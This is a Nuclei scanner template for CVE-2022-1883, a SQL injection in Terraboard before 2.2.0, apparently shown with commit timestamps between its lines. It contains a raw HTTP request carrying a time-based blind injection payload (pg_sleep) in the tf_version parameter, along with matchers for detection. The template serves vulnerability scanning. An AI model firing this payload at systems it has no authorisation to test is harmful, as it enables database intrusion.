2022-10-06 08:33:56 +00:00
id : CVE-2022-1883
info :
2022-12-09 21:40:18 +00:00
name : Terraboard <2.2.0 - SQL Injection
2022-10-06 08:33:56 +00:00
author : edoardottt
2022-11-26 15:56:40 +00:00
severity : high
2022-10-06 08:33:56 +00:00
description : |
2022-12-09 21:40:18 +00:00
Terraboard prior to 2.2.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2022-10-06 08:33:56 +00:00
reference :
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7/
2022-11-26 15:56:40 +00:00
- https://github.com/camptocamp/terraboard/commit/2a5dbaac015dc0714b41a59995e24f5767f89ddc
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7
2022-12-09 21:40:18 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1883
2022-10-06 08:33:56 +00:00
classification :
2022-11-26 15:56:40 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
2022-10-06 08:33:56 +00:00
cve-id : CVE-2022-1883
2022-11-26 15:56:40 +00:00
cwe-id : CWE-89
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:camptocamp:terraboard:*:*:*:*:*:*:*:*
epss-score : 0.11596
2022-11-26 15:56:40 +00:00
tags : cve,cve2022,terraboard,sqli,huntr
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2022-10-06 08:33:56 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-10-06 08:33:56 +00:00
- raw :
- |
@timeout : 10s
2022-11-26 15:39:18 +00:00
GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(10))+ISNULL-- HTTP/1.1
2022-10-06 08:33:56 +00:00
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : dsl
dsl :
- 'duration>=5'
2022-11-21 09:58:48 +00:00
- type : word
part : body
words :
- '"page":'
- '"results":'
condition : and
2022-10-06 08:33:56 +00:00
- type : status
status :
2022-11-21 09:58:48 +00:00
- 200
2022-12-09 21:40:18 +00:00
# Enhanced by md on 2022/12/09